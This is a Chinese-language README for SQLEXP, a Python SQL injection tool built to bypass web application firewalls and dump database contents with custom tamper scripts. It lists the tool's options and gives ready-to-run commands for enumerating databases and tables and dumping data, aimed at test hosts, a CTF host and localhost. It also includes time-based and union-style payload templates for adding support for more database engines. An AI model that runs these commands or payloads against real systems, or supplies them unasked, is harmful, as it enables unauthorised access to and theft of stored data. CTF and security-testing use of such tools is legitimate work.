Home

Awesome

SQLEXP

Python 2.7License

Paper:https://xz.aliyun.com/t/7767

PDF Download:老树新花SQL 注入WAF绕过


​ SQL 注入利用工具,存在waf的情况下自定义编写tamper脚本 dump数据.

​ 对于SQL注入漏洞利用通常情况下我们使用SQLMAP,在waf存在的场景下想利用自己独有的payload进行注入抓取数据,这个时候SQLMAP就显得那么力不存心,这种情况并不少见,对于ctfer来说经常会遇到,每次都要重复编写脚本对于一个IT人士来说显然不可接受。该工具正是解决waf存在场景下利用SQLMAP dump数据的难题,使用方法和SQLMAP基本相同,只要你会使用SQLMAP那么该工具上手非常容易.

image-20200427175012921

使用手册:

​ 使用方法和SQLmap类似,仅仅实现了mysql、oracle、mssql,支持[U|E|B|T]四种方式的注入。


Usage: python SQLEXP.py [options]

Options:
  -h, --help  show this help message and exit
Usage: python SQLEXP.py [options]

Options:
  -h, --help            show this help message and exit
  -v, --version         Show program's version number and exit

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")

  Request:
    These options can be used to specify how to connect to the target URL

    --method=METHOD     Force usage of given HTTP method (e.g. GET|POST)
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --proxy=PROXY       Use a proxy to connect to the target URL,only can use
                        http proxy:[http://127.0.0.1:8080]
    --timeout=TIMEOUT   Seconds to wait before timeout connection
    --delay=DELAY_TIME  dbms delay timeout

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p PARAMETER        Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --technique=TECH    SQL injection techniques to use (default "E")
    --string=FLAG       String to match when query is evaluated to True
    --time-sec=TIME_SEC
                        Seconds to wait before timeout connection
    --order-sec=ORDER_SEC
                        Resulting page URL searched for second-order response
    --tamper=TAMPER     Use given script(s) for tampering injection data
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --dump              Dump DBMS database table entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Misc:
    These options can be show some additional function.

    --debug             show deubg payload.
    
 Example: 
 list dbs:
#python SQLEXP.py -u "http://test.com/bypass
_sql/sqlinject.php?id=1" -p id --dbms mysql --dbs --tech U
 list tables:
#python SQLEXP.py -u "http://test.com/bypass
_sql/sqlinject.php?id=1" -p id --dbms mysql -D test --tables --tech U --proxy http://127.0.0.1:8080
 dump test db data:
#python SQLEXP.py -u "http://test.com/bypass
_sql/sqlinject.php?id=1" -p id --dbms mysql -D test --dump --tech E
#python SQLEXP.py -u "http://web.jarvisoj.com:32787/login.php" --data="username=user&password=admin" -p username --tamper=tamper_blank --dbms=mysql --technique=B --string="密码错误" --method=post  --dbs
#python SQLEXP.py-u http://localhost/sqlinject/sqlinject.php?id=2  -r req.txt --dbms mysql --tech E  --current-user  --debug

开发手册:


工具设计思想借鉴了SQLMAP整个payload由boundary和基本查询query构成

image-20200427183437621

为了方便扩展添加支持其他数据库,构造语句和payload高度分离,不同数据库不同注入方法使用单独一个文件编写,由于对数据库基本查询能力进行了高度抽象化,所以添加支持其他数据引擎非常容易,只需要copy一份已经支持的数据库代码文件,在payload.py里面添加相对应的boundary和 base query即可。

​ 比如添加支持db2:

​ 1.copy -r SQLEXP\lib\core\dbs\mysql SQLEXP\lib\core\dbs\db2

  2.在SQLEXP\lib\parse\payload.py文件里面添加对应的代码
db2_boundarys = {
    "length":"and len(%query)=%value",
    "time_length":"if(len(%query)>%value) WAITFOR DELAY '0:0:{T}'".format(T = conf.time_sec),
    ....
}
db2_payloads = {
    "query":"(select %s from t_n)",
    "base_query":"(select temp from (select ROW_NUMBER() OVER(order by (select 0)) AS limit,(%s) as temp from t_n)xx where limit=%d)",
    "query_tab":"(select tn from (select  ROW_NUMBER() OVER(order by (select 0)) AS limit,(%s) as tn from {db}.t_n)xx where limit=%d)",
    ...
}
....
if conf.dbms == 'db2':
    BOUNDARY.update(mssql_boundarys)
    SQL.update(mssql_payloads)

​ 一定注意的的是这里创建的数据库文件夹和py文件名和--dbms参数联系紧密,程序运行的时候通过--dbms的参数来决定加载那个数据库引擎的代码,所以--dbms=db2的时候,db2/db2_E.py、db2/db2_U.py等文件一定要存在。

image-20200427185702838

image-20200427185838021

参考:

https://github.com/shack2/SuperSQLInjectionV1

https://github.com/sqlmapproject/sqlmap